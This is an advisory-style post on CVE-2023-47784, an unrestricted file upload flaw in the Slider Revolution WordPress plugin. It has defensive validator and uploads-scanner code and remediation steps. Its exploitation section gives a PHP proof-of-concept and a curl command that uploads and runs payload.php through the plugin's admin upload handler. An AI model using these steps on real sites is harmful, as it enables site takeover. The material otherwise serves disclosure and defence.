A critical vulnerability has been identified in the popular WordPress plugin Slider Revolution, developed by ThemePunch OHG. The issue, tracked as CVE-2023-47784, is an unrestricted upload of a file with a dangerous type (CWE-434): the plugin's upload handler does not adequately restrict what kind of file can be stored on the server. A script uploaded this way is executed by the web server, which can lead to unauthorized access to sensitive data, cross-site scripting (XSS) through uploaded HTML or JavaScript files, and potentially full takeover of the site. This post gives an overview of the vulnerability, how it is exploited, and the necessary mitigation measures.

Affected Versions

All versions of Slider Revolution up to and including 6.6.15 are affected; the fix shipped in version 6.6.16.

Details of the Vulnerability

The core of the vulnerability lies in how the plugin handles file uploads from the administrator dashboard. The upload handler validates the client-supplied file name only by its extension, and the extension allow-list is not restrictive enough, so an attacker with access to the upload function can store a file of a dangerous type, for example a PHP script that the web server will then execute. A simplified version of the affected upload handler looks like this:

```php
if (isset($_FILES["file"]) && isset($_POST['folder'])) {
  $file = $uploaded_file;
  ...
  // Only the final extension of the client-supplied file name is inspected
  $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
  ...
  if (in_array($ext, $allowed_extensions)) { // (*) extension allow-list
    // The file is moved under the web root without examining its contents
    move_uploaded_file($_FILES["file"]["tmp_name"], $new_filename);
    ...
  }
}
```

The check at (*) compares the uploaded file's extension against a list of allowed extensions. Because that list is not sufficiently restrictive, and because nothing else about the file is verified (neither its contents nor its declared MIME type, and only the final extension is examined), an adversary can upload files with dangerous extensions and have them stored inside the web root.
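The following is an added example, not Slider Revolution's code: it puts a weak extension check written in the style of the snippet above next to a hardened replacement, and runs both against constructed file names and contents. The function names, the BROAD_LIST allow-list and the sample files are assumptions for illustration and do not come from the plugin.

```php
<?php
// Added example (not Slider Revolution's code): weak extension check in the
// style of the advisory's snippet, beside a hardened replacement.
// BROAD_LIST, the function names and the sample files are constructed.

// A constructed, overly broad allow-list. html and svg are included to show
// that "not PHP" is not the same as "safe": both run scripts in the browser.
const BROAD_LIST = ['jpg', 'jpeg', 'png', 'gif', 'zip', 'txt', 'html', 'svg'];

// Weak check: only the last dotted segment is compared and the file contents
// are never examined.
function validate_upload_weak(string $filename): bool
{
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    return in_array($ext, BROAD_LIST);
}

// Hardened check: strict allow-list of image types mapped to the MIME type
// the bytes must have, lower-cased extension, every dotted segment checked
// (payload.php.gif), dotfiles refused (.htaccess), contents sniffed, and
// polyglots carrying a PHP open tag refused.
function validate_upload_hardened(string $filename, string $tmpPath): bool
{
    $allowed   = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                  'png' => 'image/png',  'gif'  => 'image/gif', 'webp' => 'image/webp'];
    $forbidden = ['php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml',
                  'phar', 'phps', 'inc', 'htaccess', 'html', 'htm', 'svg', 'js'];

    $base = basename($filename);
    if ($base === '' || $base[0] === '.') {
        return false;                                  // no dotfiles
    }
    $segments = explode('.', strtolower($base));
    if (count($segments) < 2) {
        return false;                                  // no extension at all
    }
    $ext = array_pop($segments);
    if (!isset($allowed[$ext])) {
        return false;                                  // not an allowed image type
    }
    foreach ($segments as $segment) {
        if (in_array($segment, $forbidden, true)) {
            return false;                              // double-extension trick
        }
    }

    // Decide on what the bytes are, not on what the name claims.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== $allowed[$ext]) {
        return false;
    }

    // Refuse a valid image that also carries a PHP open tag.
    $head = file_get_contents($tmpPath, false, null, 0, 1 << 20);
    return $head !== false && preg_match('/<\?(php|=)/i', $head) !== 1;
}

// Constructed samples: a minimal 1x1 GIF, and a PHP script.
$gif = tempnam(sys_get_temp_dir(), 'ok');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    . "!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;");
$php = tempnam(sys_get_temp_dir(), 'bad');
file_put_contents($php, "<?php echo 'executed'; ?>");

$cases = [
    ['banner.gif',      $gif],   // legitimate image
    ['payload.php',     $php],   // script with a script extension
    ['payload.jpg',     $php],   // script renamed to an image extension
    ['payload.php.gif', $gif],   // real image behind a double extension
    ['page.html',       $php],   // allowed by the broad list, an XSS vector
];
foreach ($cases as [$name, $path]) {
    printf("%-16s weak=%-5s hardened=%s\n", $name,
        validate_upload_weak($name) ? 'pass' : 'fail',
        validate_upload_hardened($name, $path) ? 'pass' : 'fail');
}
unlink($gif);
unlink($php);
```

Run it with `php validate.php`. The weak check passes the renamed script, the double-extension name and the HTML file, while the hardened check accepts only the genuine GIF. Inside WordPress the equivalent built-in controls are `wp_check_filetype_and_ext()` and `wp_handle_upload()`, which apply the site's allowed MIME types and sniff the content; a plugin that writes files into the web root itself should at least match what those functions enforce.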

To exploit this vulnerability, an attacker with access to the plugin's upload function in the dashboard would perform the following steps:

1. Craft a malicious file with a dangerous extension, such as a .php file containing code to be executed on the server. The proof of concept below only reflects a query parameter, which is enough to confirm that the server executes the upload:

```php
<?php
// Proof of concept: confirms server-side execution by reflecting a parameter
echo "Hacked by " . htmlspecialchars($_GET['name']) . "!";
?>
```

2. Send a specially crafted HTTP request to the vulnerable website with the malicious file attached, for example with curl or from a browser with the developer tools open. Because the upload handler lives in the administrator dashboard, the request must carry the session cookie of a WordPress user who can reach the plugin page; an unauthenticated request to admin.php is simply redirected to the login form. For instance:

```bash
curl -i -F "file=@payload.php" -F "folder=./" "https://example.com/wp-admin/admin.php?page=slider-revolution-plugin"
```

3. Once the malicious file is uploaded, request it through a web browser or any other HTTP client. In this scenario, the attacker would request the following URL, and a response of "Hacked by AttackerName!" confirms code execution:

```
https://example.com/wp-content/uploads/payload.php?name=AttackerName
```

References

- Slider Revolution - Official Plugin Page

- CVE-2023-47784 - NVD Entry

- Security Advisory by Plugin Developer

To remediate this issue, follow these steps:

1. Update the Slider Revolution plugin to version 6.6.16 or later, which contains the necessary security fix.

2. Verify that no previously uploaded dangerous files remain under wp-content/uploads/. Updating the plugin closes the upload path but does not remove files that were already uploaded, so look for PHP scripts (including double extensions such as .php.jpg), .htaccess files and HTML or JavaScript files in that tree, and review the web server access logs for requests to unexpected paths under uploads. Scan the website and server for other signs of unauthorized access or malicious activity, and treat any confirmed upload as a compromise that warrants credential rotation and a wider investigation.

3. Keep all plugins and themes updated and audit them regularly. This significantly reduces exposure to known vulnerabilities and helps safeguard the website against attacks.

By applying these measures, you can protect your WordPress site from CVE-2023-47784 and reduce exposure to similar unrestricted-upload flaws in the future.
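As an added example for the clean-up in step 2 (not part of the advisory or of the plugin), the script below walks an uploads tree and flags files that should never be there: server configuration files, anything with a script extension in any dotted segment, and any file whose content starts with a PHP open tag regardless of its name. The scanned directory, the extension lists and the constructed sample tree are assumptions.

```php
<?php
// Added example, not part of the advisory: sweep a WordPress uploads tree for
// files that should not be there after an unrestricted-upload incident.
// SCRIPT_EXTS, CONFIG_FILES and the sample tree are constructed for the demo.

const SCRIPT_EXTS  = ['php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml',
                      'phar', 'phps', 'inc', 'cgi', 'pl', 'py', 'sh'];
const CONFIG_FILES = ['.htaccess', '.user.ini', 'web.config', 'php.ini'];

// Walk $root and return one entry per suspicious file with the reasons it was
// flagged and its modification time, which helps scope when the upload happened.
function scan_uploads(string $root): array
{
    $hits = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($iter as $path => $info) {
        if (!$info->isFile()) {
            continue;
        }
        $reasons = [];
        $name = strtolower($info->getFilename());

        if (in_array($name, CONFIG_FILES, true)) {
            $reasons[] = 'server configuration file inside uploads';
        }
        // Every dotted segment after the first, so shell.php.jpg is caught too.
        foreach (array_slice(explode('.', $name), 1) as $segment) {
            if (in_array($segment, SCRIPT_EXTS, true)) {
                $reasons[] = "script extension .$segment";
                break;
            }
        }
        // Content check: a PHP open tag in the first 64 KiB, whatever the name.
        $head = @file_get_contents($path, false, null, 0, 65536);
        if ($head !== false && preg_match('/<\?(php|=)/i', $head) === 1) {
            $reasons[] = 'PHP open tag in file content';
        }

        if ($reasons !== []) {
            $hits[] = ['path'    => $path,
                       'mtime'   => date('c', $info->getMTime()),
                       'reasons' => $reasons];
        }
    }
    return $hits;
}

// Constructed uploads tree in a temp directory: one clean image, a dropped
// script, a script hidden behind an image extension, and an .htaccess file.
$root = sys_get_temp_dir() . '/uploads-' . bin2hex(random_bytes(4));
mkdir("$root/2023/12", 0700, true);
file_put_contents("$root/2023/12/banner.gif",  "GIF89a\x01\x00\x01\x00");
file_put_contents("$root/2023/12/payload.php", "<?php echo 'Hacked'; ?>");
file_put_contents("$root/2023/12/logo.jpg",    "\xFF\xD8\xFF<?php echo 'polyglot'; ?>");
file_put_contents("$root/2023/12/.htaccess",   "# constructed sample\n");

foreach (scan_uploads($root) as $hit) {
    printf("%s (%s): %s\n", $hit['path'], $hit['mtime'], implode('; ', $hit['reasons']));
}

// Remove the constructed tree again.
foreach (new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::CHILD_FIRST) as $p => $i) {
    $i->isDir() ? rmdir($p) : unlink($p);
}
rmdir($root);
```

To use it on a real site, point `$root` at the site's wp-content/uploads directory and drop the sample-tree section. Only banner.gif is left unflagged; the three other files are reported with their reasons and timestamps. Pair the sweep with a web server rule that refuses to execute scripts under the uploads directory, so that a file that slips past any future upload check is served as inert data rather than run.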

Timeline

Published on: 12/20/2023 19:15:10 UTC
Last modified on: 12/27/2023 20:05:27 UTC